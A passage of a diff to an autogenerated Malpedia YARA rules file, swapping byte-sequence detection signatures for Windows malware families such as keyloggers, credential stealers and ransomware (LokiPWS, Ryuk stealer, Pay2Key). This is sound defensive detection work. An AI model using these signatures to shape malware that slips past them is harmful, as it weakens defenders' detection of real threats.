$sequence_5 = { e8???????? 488b542440 48895008 833d????????00 750d 488b9424c0000000 488910 } - $sequence_6 = { e8???????? 4889842428080000 48899c2480110000 488b8424a0080000 48c7c3ffffffff 0f1f440000 e8???????? } - $sequence_7 = { e8???????? 488d8424d8000000 488b9c2408010000 90 e8???????? b801000000 eb21 } - $sequence_8 = { e8???????? 803d????????00 7431 488d1543fa1a00 488915???????? 833d????????00 7509 } - $sequence_9 = { ffd2 84c0 7556 488d0509aa3000 488b5c2430 488b4c2438 e8???????? } + $sequence_0 = { 4154 90 415c 90 } + $sequence_1 = { 4155 49c7c501000000 4150 4152 415a } + $sequence_2 = { 52 0f77 90 5a } + $sequence_3 = { 0f77 0f77 5b 0f77 } + $sequence_4 = { 49c7c501000000 4150 4152 415a 4158 } + $sequence_5 = { 52 50 58 5a 49ffc9 } + $sequence_6 = { 49c7c501000000 4150 4152 415a 4158 49ffcd } + $sequence_7 = { 4150 4152 415a 4158 } + $sequence_8 = { 4155 49c7c501000000 4150 4152 415a 4158 49ffcd } + $sequence_9 = { 4152 415a 4158 49ffcd } condition: - 7 of them and filesize <11612160 + 7 of them and filesize <4186112 } -rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE +rule MALPEDIA_Win_Ketrican_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "888501fd-ce54-593e-a428-69ec62ec3120" + id = "03c6cec7-6d12-51a2-b1a9-8239f834bf9b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netrepser_keylogger_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ketrican_auto.yar#L1-L227" license_url = "N/A" - logic_hash = "afbddedf93927cf0ceddcdc20a2ff3aea4d270191a04c2cfa6d38a1b702f0067" + logic_hash = "c6a0e9c9ef6d7c9c9c9505df3e47863f2b32a94701647f7dc167a7885087d327" score = 75 - quality = 75 + quality = 71 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -170341,38 +173197,45 @@ rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a55f3 80c201 8855f3 837df807 7517 0fbe45f3 c6840570ffffff3a } - $sequence_1 = { 51 8b5508 52 ff15???????? eb71 8d45ec 50 } - $sequence_2 = { 51 680104c378 e8???????? 83c40c 8d55e8 52 } - $sequence_3 = { 8945f4 8b45f4 33d2 b900ca9a3b f7f1 8955f4 8b55f4 } - $sequence_4 = { 33c9 894ddc 894de0 894de4 894de8 c745dc10000000 c745e001000000 } - $sequence_5 = { 8b55f0 52 ff15???????? 8b45c0 8be5 } - $sequence_6 = { c645f274 c645f369 c645f466 c645f569 } - $sequence_7 = { 7e0b 83bde4feffff08 7d02 ebcb 83bde4feffff1a 7e0b } - $sequence_8 = { c744240c57726974 c74424106550726f c744241463657373 c74424184d656d6f c744241c72790000 ff15???????? a3???????? } - $sequence_9 = { 8b701c 8bcf e8???????? 8b4c240c } - $sequence_10 = { 51 c74424084f70656e c744240c50726f63 c744241065737300 ff15???????? a3???????? 8b542448 } - $sequence_11 = { 56 33ff 53 8906 894e08 } - $sequence_12 = { 68???????? ff15???????? 8bf8 85ff 7472 } - $sequence_13 = { 55 8b6c244c 85c0 7550 } - $sequence_14 = { f3a5 8b8c24b4000000 a4 8db329010000 56 } - $sequence_15 = { b840000000 55 89442410 89442414 8d442410 50 8d4c2418 } + $sequence_0 = { 8965f0 33db 895dfc 33c0 } + $sequence_1 = { 7417 6a0a 6a1f 68???????? } + $sequence_2 = { e8???????? 83c010 8906 c3 56 } + $sequence_3 = { 8bd1 e8???????? 5f 5e c3 55 8bec } + $sequence_4 = { 8b06 5d c20400 55 8bec 8b4508 894508 } + $sequence_5 = { 8bc1 8945f0 834dfcff e8???????? } + $sequence_6 = { 8901 5b 5d c20800 680e000780 e8???????? cc } + $sequence_7 = { 680e000780 e8???????? cc 8b06 83e810 8b08 } + $sequence_8 = { 48 7445 48 743a 48 } + $sequence_9 = { 884603 83c604 8345f804 8b45f8 5f } + $sequence_10 = { 58 668945d8 6a72 58 } + $sequence_11 = { 6a00 8d85f1fbffff 50 e8???????? 83c40c 6800040000 } + $sequence_12 = { ff7508 53 53 ffd6 5f 5e } + $sequence_13 = { 740a 48 754a e8???????? } + $sequence_14 = { 83c002 663bd3 75f5 2bc1 d1f8 8d7001 6800080200 } + $sequence_15 = { e8???????? 8b8a8c2f0000 33c8 e8???????? b8???????? } + $sequence_16 = { ff15???????? 68???????? c705????????98824100 a3???????? } + $sequence_17 = { 8d420c 8b4ae8 33c8 e8???????? 8b8a4c010000 } + $sequence_18 = { 33c8 e8???????? 8b8ae8080000 33c8 e8???????? } + $sequence_19 = { 8d4dd0 e9???????? 8d4de0 e9???????? 8d4db8 e9???????? 8d4ddc } + $sequence_20 = { b8???????? e9???????? 8b542408 8d420c 8b8aa4feffff 33c8 } + $sequence_21 = { c705????????98824100 a3???????? c605????????00 e8???????? 59 } + $sequence_22 = { 8b8a54ffffff 33c8 e8???????? 8b8adc090000 33c8 e8???????? } condition: - 7 of them and filesize <303104 + 7 of them and filesize <1449984 } -rule MALPEDIA_Win_Lockergoga_Auto : FILE +rule MALPEDIA_Win_Pay2Key_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c23217f-5659-545b-a560-32c15b901216" + id = "26097eea-fdd3-5ff6-a78a-aae3970171ae" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockergoga_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pay2key_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "0b1cfe6b39387960d8fabaa4bf38642a4ddd7ce3aadb70d3ac9c167b96d0b767" + logic_hash = "fed562ca29ad610b012032606168f69e452506f6e6212e1bb41332762ffb58be" score = 75 quality = 75 tags = "FILE" @@ -170386,32 +173249,32 @@ rule MALPEDIA_Win_Lockergoga_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 33c0 897dd4 8b560c 33c9 894514 3bc3 } - $sequence_1 = { 725e 8b06 8b7e38 8b80e4000000 89459c 3bd7 722c } - $sequence_2 = { e8???????? 50 ffb5f0feffff 8d85c0feffff c645fc0c 50 8bcf } - $sequence_3 = { ff10 8d4b10 e8???????? 6a38 53 e8???????? 83c408 } - $sequence_4 = { e8???????? 8d45d8 c645fc04 50 8bcb e8???????? 8b1b } - $sequence_5 = { e8???????? 8d45c0 c645fc01 50 8bce e8???????? 8bf0 } - $sequence_6 = { 8b4df0 33cd e8???????? 8be5 5d c3 ff7594 } - $sequence_7 = { 8b5904 8b7d0c 8975e8 8975ec 8945f0 c745fc00000000 85ff } - $sequence_8 = { f30f7e4710 660fd64610 c7471000000000 c747140f000000 c60700 83c718 c745fcffffffff } - $sequence_9 = { e8???????? 8bc8 3bcf 7413 837f1410 8bc7 7202 } + $sequence_0 = { f7d1 33d2 3b4dfc 8bcb 0f43d0 3bd7 0f43fa } + $sequence_1 = { e8???????? 8d4e2c e8???????? 8d4e14 e8???????? c74604???????? 8b7e10 } + $sequence_2 = { ffd7 837d1c08 8d5508 8d7508 0f435508 0f437508 } + $sequence_3 = { c745fc00000000 833e00 7517 68de020000 68???????? 68???????? } + $sequence_4 = { 50 e8???????? 83ec18 c645fc05 8bcc 896584 c7411000000000 } + $sequence_5 = { 3bf7 0f8595f7ffff 83cfff c745fc07000000 8b750c 85f6 7429 } + $sequence_6 = { eb05 6880000000 8bce e8???????? 8b4e20 8bc3 8b09 } + $sequence_7 = { c7461000000000 7202 8b36 33c0 668906 8db758030000 8b4614 } + $sequence_8 = { 3bf7 758c 8b5dec ff7314 8b35???????? ffd6 } + $sequence_9 = { eb02 33c0 894758 8d5758 8a4304 88475c e8???????? } condition: - 7 of them and filesize <2588672 + 7 of them and filesize <2252800 } -rule MALPEDIA_Win_Tigerlite_Auto : FILE +rule MALPEDIA_Win_Daserf_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aa691ec3-b883-5f5c-8994-9e33da37724e" + id = "fffb2935-58a7-5828-bf22-dd469fea2b59" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tigerlite_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.daserf_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "fcf8f4ae129308f814ca77b619fbfadd3ec5da4949cb79481c9fac330ba09f68" + logic_hash = "194f8b1f42d6928a216ace153b63a40c6d813ea5df60a79ed82a9b2168ff69ee" score = 75 quality = 75 tags = "FILE" @@ -170425,38 +173288,38 @@ rule MALPEDIA_Win_Tigerlite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1f805 83e71f c1e706 8b0485489d4100 83c00c 03c7 50 } - $sequence_1 = { 8b85e0f7ffff 85c0 751d 56 ff15???????? b832000000 5f } - $sequence_2 = { 8b8d24e5ffff 50 8b8528e5ffff 8b0485489d4100 } - $sequence_3 = { 85c0 740d ff15???????? b8c8000000 eb65 } - $sequence_4 = { ff15???????? cc 4c8d4510 488d15bbc80100 } - $sequence_5 = { 41b8ff030000 c6859000000000 e8???????? 488d1528bc0100 488d8d90000000 e8???????? } - $sequence_6 = { 33c0 8bbdbcfdffff 0fbebcc7f8214100 8bc7 89bdbcfdffff 8bbde4fdffff } - $sequence_7 = { 668986b8000000 668986be010000 c7466878874100 83a6b803000000 6a0d e8???????? } - $sequence_8 = { 4863c2 4803d8 eb61 4b8b84ea604a0200 42f644300848 743e 48ffc3 } - $sequence_9 = { 663955d8 7442 668933 8a45d8 4b8b8cea604a0200 4288443109 } - $sequence_10 = { 8b3495489d4100 8a441e04 84c0 0f8957020000 } - $sequence_11 = { 488bcb 488bf8 e8???????? 4885ff 0f8405040000 4c8d4530 488d0da1a40100 } - $sequence_12 = { 488d4c2440 418bd6 e8???????? e9???????? } - $sequence_13 = { b9e5000000 8bd8 83e303 e8???????? } - $sequence_14 = { 3bfa 7556 8bcb e8???????? 53 } - $sequence_15 = { 8d0c00 894dec eb38 8b45f4 8b0485489d4100 } + $sequence_0 = { 8945cc ff15???????? 8945d0 8d45b4 } + $sequence_1 = { b808380000 e8???????? 53 56 } + $sequence_2 = { 81eb7ee5b031 81c30d782341 81c3db5d1091 81eb73ad763b 054ce1128c 81c3cc3c3014 } + $sequence_3 = { 81c3ad482863 81eb8c570d21 2d21583cc4 2da932ed1b 81c3f8ff2857 81eb46159323 } + $sequence_4 = { 81eb4e0e3377 87c0 81ebfb04024c 87ff 2dfaa67876 } + $sequence_5 = { 81c394c7d041 81eb6afed62a 81c3bed1834b 81eb826387e9 81c3d7e98170 2d844df6b2 } + $sequence_6 = { 50 ffd6 ffb56814ffff 8d85bc4fffff 50 } + $sequence_7 = { 2d4936916d f7d1 f7d1 2d99d06187 f7d1 f7d1 } + $sequence_8 = { 8bc9 81c3c9920a05 95 89ac2400f2ffff } + $sequence_9 = { 7500 81c3e109e0f6 8bc0 0537d68276 9b 81c38da225f6 87c9 } + $sequence_10 = { eb0e ff75fc ffd7 3bf3 7403 56 } + $sequence_11 = { 81c327f27a10 7500 81ebc884a519 7500 81eb3a0de80d 87db 81c3b119330a } + $sequence_12 = { 2d4abc1884 90 2dea9bf526 7500 } + $sequence_13 = { 81ebf74ea63a f7d1 f7d1 81eb199760ae 9b } + $sequence_14 = { 2d966cdd4c 2d81c26ac5 81c32b73f252 81c32bef6e96 81c3b4dacce0 } + $sequence_15 = { 81eb075e2ddb 9b 81c35a11e727 97 89bc2440f5ffff } condition: - 7 of them and filesize <349184 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Kagent_Auto : FILE +rule MALPEDIA_Win_Mindware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03cb1012-1d40-5351-bbf3-a59896f7ae1b" + id = "205d25dc-9d1d-5cfe-9a1e-fc1d20bf21d6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kagent_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mindware_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "0b8f6427b4a4852531dd043f44e54d80aff6015551c819a2c415062a93726e8a" + logic_hash = "0229e104e7ced878ae1d5a8dad7ae14c8a1e11edebe2196883325f14972bfdf1" score = 75 quality = 75 tags = "FILE" @@ -170470,32 +173333,32 @@ rule MALPEDIA_Win_Kagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 84c9 75f9 2bc2 888c2474020000 33c9 89442440 66894c2452 } - $sequence_1 = { e8???????? 8be5 5d c20400 8d4de8 51 c7434c00000080 } - $sequence_2 = { 8b75e8 52 51 e8???????? 8b4508 } - $sequence_3 = { c645fc04 884b48 0f90c1 f7d9 0bc8 51 } - $sequence_4 = { 8bd0 2bd6 0fb70432 0fb70e 2bc1 } - $sequence_5 = { 884608 33c9 b801000000 ba02000000 f7e2 0f90c1 f7d9 } - $sequence_6 = { 57 ff15???????? 85c0 7514 83c604 81fe???????? 7cd7 } - $sequence_7 = { e8???????? 894624 c6462801 8b4624 33c9 895e20 668908 } - $sequence_8 = { 0f858cfcffff 8b542420 8d0411 39442438 8b5378 0f94c1 } - $sequence_9 = { 50 e8???????? 83c404 8a45f3 8b4df4 64890d00000000 59 } + $sequence_0 = { 50 ff15???????? 8dbd48ffffff 32c0 b980000000 f3aa } + $sequence_1 = { c78530e9ffffeccc4300 c78534e9fffff4cc4300 c78538e9ffff0ccd4300 c7853ce9ffff18cd4300 c78540e9ffff38cd4300 c78544e9ffff40cd4300 c78548e9ffff4ccd4300 } + $sequence_2 = { c7857cf4ffff24e94300 c78580f4ffff38e94300 c78584f4ffff40e94300 c78588f4ffff48e94300 c7858cf4ffff58e94300 } + $sequence_3 = { c1e910 335808 0fb6c9 895df4 33148df0d04400 } + $sequence_4 = { 894dfc 89482c c1e918 897028 0fb699f0d84400 8b4dfc c1e910 } + $sequence_5 = { 0fb6c9 33148dc0c84400 335004 8b4dfc c1e908 8955e8 0fb6d1 } + $sequence_6 = { 8bec 837d0c00 764c e8???????? 0fb6c0 85c0 } + $sequence_7 = { 6a00 8b856cffffff 50 8b8d68ffffff 51 8b55bc 52 } + $sequence_8 = { c78530e6ffff5cc54300 c78534e6ffff68c54300 c78538e6ffff70c54300 c7853ce6ffff78c54300 c78540e6ffff88c54300 c78544e6ffff90c54300 c78548e6ffffa0c54300 } + $sequence_9 = { 33d2 034dc8 1355cc 894dc8 8955cc e9???????? 8b45dc } condition: - 7 of them and filesize <4972544 + 7 of them and filesize <661504 } -rule MALPEDIA_Win_Pslogger_Auto : FILE +rule MALPEDIA_Win_Metadatabin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "15c6e79e-2171-5604-b7eb-21f0a1c9eae7" + id = "ddd31612-5b1e-5a32-9ee2-3a06fec41c32" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pslogger_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.metadatabin_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "8992cc308f36218b8fec7cd3351151cd41f7bbe9e5dc91614732d13ffd45e45b" + logic_hash = "11b64ee680ef1e61921c6aade590c08f83cd6a9ae0a068d4e02dca568fca78c2" score = 75 quality = 75 tags = "FILE" @@ -170509,38 +173372,32 @@ rule MALPEDIA_Win_Pslogger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7463 488bc8 e8???????? 8bc8 e8???????? 85c0 } - $sequence_1 = { 488d8c2480030000 e8???????? 488d542420 488bcd } - $sequence_2 = { e8???????? e9???????? 4c8bc5 33d2 488bc8 } - $sequence_3 = { b9b80b0000 e8???????? 33d2 41b8b80b0000 488bc8 4c8be0 e8???????? } - $sequence_4 = { 57 4883ec20 488b19 488bf9 483b5908 7418 } - $sequence_5 = { 483bc8 740e 4885c9 7406 ff15???????? } - $sequence_6 = { e9???????? 8d4601 4863e8 488bcd } - $sequence_7 = { e8???????? b9b80b0000 e8???????? 33d2 } - $sequence_8 = { 85c0 0f844c030000 83f826 7603 6a26 58 0fb60c85d64b4200 } - $sequence_9 = { 6a00 53 e8???????? ffb5e0feffff 56 ffb5e4feffff 68???????? } - $sequence_10 = { 8b7c2410 2bd6 83c7fe 668b4702 } - $sequence_11 = { 7504 8816 eb3e c6060d 8b048d88b14200 8854382a } - $sequence_12 = { c1fa06 6bc830 8b049588b14200 8a440828 a848 7404 33c0 } - $sequence_13 = { 894606 8d4594 50 8d4676 } - $sequence_14 = { 6bf830 894df8 6a0a 8b048d88b14200 5b 8b543818 8955ec } - $sequence_15 = { 8b049d88b14200 8945d8 85c0 7553 e8???????? 89049d88b14200 } + $sequence_0 = { 89d1 89c6 8b8424d0000000 11d9 0f92c3 f7e7 89c7 } + $sequence_1 = { 8bbde8feffff 0f44c8 01fa 39da 0f4cd3 85ff 0f45da } + $sequence_2 = { 8b8c2488000000 13442448 897c243c 660f6e4c243c 89f7 8b74245c 83d300 } + $sequence_3 = { 8b742414 8b542424 39de 0f841c010000 0f836e010000 0fb7447430 0512230000 } + $sequence_4 = { 8b85f8feffff c744240800000000 895c2404 890424 ff95f4feffff c785fcfeffff01000000 8b8568feffff } + $sequence_5 = { f7e3 8b5c2470 01c8 89842458010000 0fb6442428 11c2 89d8 } + $sequence_6 = { 897c240c 89fa 89c7 b8ffff0700 660f6e8c2420010000 83d700 660f6e5c240c } + $sequence_7 = { 8d34c0 89442424 01f6 01d1 8b542408 11fe 8b7c241c } + $sequence_8 = { 89d3 89442418 89f8 039c2480010000 83d100 f7642460 01d8 } + $sequence_9 = { 660f70d044 660fefe6 f30f6fb42460050000 660fdbe2 660fefdc 660fefa424a0000000 660f6fc1 } condition: - 7 of them and filesize <475136 + 7 of them and filesize <1263616 } -rule MALPEDIA_Win_Daxin_Auto : FILE +rule MALPEDIA_Win_Unidentified_041_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f296881b-770d-5563-abfb-71fa7b0b574a" + id = "54c40e17-80e5-57a5-babe-281dfc0f14df" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.daxin_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_041_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "474b282908002ac6ff5a401d8cd2ee0d1c71eaec687bd0f7b672c512154787e2" + logic_hash = "72336cc9bc2b4e7b40dbb912cf40721cd5c8d54310aa5ce8f7ef42d8a402b398" score = 75 quality = 75 tags = "FILE" @@ -170554,37 +173411,32 @@ rule MALPEDIA_Win_Daxin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 2bc2 d1f8 99 f7f9 } - $sequence_1 = { ff15???????? 488b0d???????? 483bcb 7458 895c2448 48895c2440 895c2438 } - $sequence_2 = { 751a baea050000 33c9 41b84d4b4353 } - $sequence_3 = { ff15???????? 488983f8000000 4883a3d800000000 33d2 488d8bb0000000 448d4220 e8???????? } - $sequence_4 = { 83e21f 03c2 8bc8 83e01f c1f905 2bc2 488b5328 } - $sequence_5 = { ff15???????? 488b0d???????? 48832700 33d2 4533c0 } - $sequence_6 = { 83e27f 03c2 83e07f 2bc2 4863c8 8a8419c5010000 } - $sequence_7 = { 83e3e0 41b84d4b4353 83c320 83e203 03c2 895910 c1f802 } - $sequence_8 = { 88480d 8b5368 42 895368 } - $sequence_9 = { 884c241b c744241c08000000 c783b401000001000000 ff93f0020000 } - $sequence_10 = { 884c2450 83c9ff 33c0 f2ae } - $sequence_11 = { 885004 33c0 f2ae f7d1 } - $sequence_12 = { 88480d 8b4500 50 ff5018 } - $sequence_13 = { 884805 8b0b b807000000 c6410600 8b4b04 3bc8 } - $sequence_14 = { 88482b 81c6a1000000 8990b0000000 3bf2 } + $sequence_0 = { ff761c ff7618 ff7304 e8???????? 8d45bf c645bf0d 50 } + $sequence_1 = { 885d9b e9???????? 391f 75c7 385e04 752e } + $sequence_2 = { 8b3f 8d44242c 50 53 68???????? 57 6a02 } + $sequence_3 = { c645fc02 8b08 52 53 50 ff5118 85c0 } + $sequence_4 = { eb05 be57000780 5f 8bc6 5e 5b c20400 } + $sequence_5 = { 85c0 7509 56 e8???????? 59 eba7 8d47ff } + $sequence_6 = { ff75e0 e8???????? 8b45f0 83c418 2b06 8bce c1f802 } + $sequence_7 = { 7430 ff7508 8bfe 33c0 ab ab ab } + $sequence_8 = { ff5024 85c0 0f8889040000 33c0 8dbd22fdffff 66898520fdffff ab } + $sequence_9 = { 8d8d54ffffff e8???????? 8bc6 e9???????? ff15???????? 50 8d8d28ffffff } condition: - 7 of them and filesize <3475456 + 7 of them and filesize <1097728 } -rule MALPEDIA_Win_Kingminer_Auto : FILE +rule MALPEDIA_Win_Phoreal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "13b82737-eb1a-51ab-9795-8340f262e7e5" + id = "edae0032-d1e1-5b3c-8d3f-ebef8f58d4b7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kingminer_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phoreal_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "f79d58fb6043de2ccd7faac7ea9ed3b2513556edb2a1cd9df8f496a155aebade" + logic_hash = "d8f5fe4e88399cfa18864e41db820daba4b617ffb107b587cb04424a8ab682db" score = 75 quality = 75 tags = "FILE" @@ -170598,32 +173450,32 @@ rule MALPEDIA_Win_Kingminer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a1???????? 885c30fe a1???????? 0fb64c30f9 884c30fc } - $sequence_1 = { ff15???????? 6a01 ff15???????? 6a00 ff15???????? 8b4508 } - $sequence_2 = { 83c40c 807c30ff62 8d4c30ff 0f8599010000 } - $sequence_3 = { ff15???????? 6a00 ff15???????? 8b80c0000000 85c0 7422 } - $sequence_4 = { 6a00 ff15???????? 6a00 ff15???????? 6a01 ff15???????? 6a00 } - $sequence_5 = { 3bf0 741e 68c1000000 ff15???????? 5b } - $sequence_6 = { ff15???????? a1???????? 50 ffd7 ff15???????? 6a01 ff15???????? } - $sequence_7 = { 6a04 6800100000 51 52 ffd0 83c414 85c0 } - $sequence_8 = { 8d4dec 51 8d580c 56 8bc7 c745ec89480489 } - $sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 } + $sequence_0 = { 8d4c2414 51 8b4b04 8d542410 52 8d442418 50 } + $sequence_1 = { 8b570c 8d442440 6a00 50 895350 } + $sequence_2 = { 56 57 33ff 8bf0 8d4701 } + $sequence_3 = { 75c4 8d8de4fdffff c645fc02 e8???????? bf10000000 397de4 720c } + $sequence_4 = { 8b54245c 51 8b4c245c 52 8b542458 51 48 } + $sequence_5 = { 03c3 83c9ff 2bc8 3bca } + $sequence_6 = { 8b7510 b90e000000 f3a5 5e 5f 8be5 5d } + $sequence_7 = { 6a01 6a00 6a00 51 50 ff15???????? 85c0 } + $sequence_8 = { 52 8d434e 50 8d434b 8d534d 8d4b4c 50 } + $sequence_9 = { 894de0 894de4 8b8d78fdffff 8d1447 51 52 } condition: - 7 of them and filesize <165888 + 7 of them and filesize <622592 } -rule MALPEDIA_Win_Backconfig_Auto : FILE +rule MALPEDIA_Win_Lokipws_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18fd149c-ad9b-5433-8651-ac1dcd92de05" + id = "51c802c9-41e6-5018-92e7-bd3c468d0c8a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backconfig_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lokipws_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead" + logic_hash = "c67ee200474ecbc3881960b10110e8aa7bde902411981013b30687544f7cfcf3" score = 75 quality = 75 tags = "FILE" @@ -170637,32 +173489,32 @@ rule MALPEDIA_Win_Backconfig_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff } - $sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 } - $sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff } - $sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce } - $sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 } - $sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff } - $sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 } - $sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? } - $sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 } - $sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 } + $sequence_0 = { 55 8bec 83ec1c 6a2a 58 6a4d 668945e4 } + $sequence_1 = { 53 57 a3???????? e8???????? 68???????? 56 } + $sequence_2 = { 50 688b778dfe 50 e8???????? 8d4df8 } + $sequence_3 = { 6a00 ff75fc ff35???????? e8???????? 6a00 6a00 } + $sequence_4 = { 56 ff750c e8???????? 83c40c 85c0 7420 90 } + $sequence_5 = { 50 ff7508 8975fc e8???????? 8bf8 59 59 } + $sequence_6 = { 58 66895dc4 668975ca 66897dcc 66895dce 668955d0 66895dd2 } + $sequence_7 = { 6a02 e8???????? ff750c ff7508 ffd0 5d c3 } + $sequence_8 = { 668945f2 58 6a6e 668945f6 58 668945fa 33c0 } + $sequence_9 = { 83fe05 6a02 58 0f47f0 33db 43 3bf3 } condition: - 7 of them and filesize <217088 + 7 of them and filesize <1327104 } -rule MALPEDIA_Win_Mikoponi_Auto : FILE +rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e1f9d663-47fc-536a-afed-a18f76559a32" + id = "129184de-8948-5274-9e65-221045ceab9c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mikoponi_auto.yar#L1-L105" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ryuk_stealer_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "e53726bff6b275a8cbfe6479d201a659d381061025ff16663204532183241afc" + logic_hash = "32617ac72ab27e6e0bdc0cedf044a04c83b7c2ead314f2e254d4a430611a1927" score = 75 quality = 75 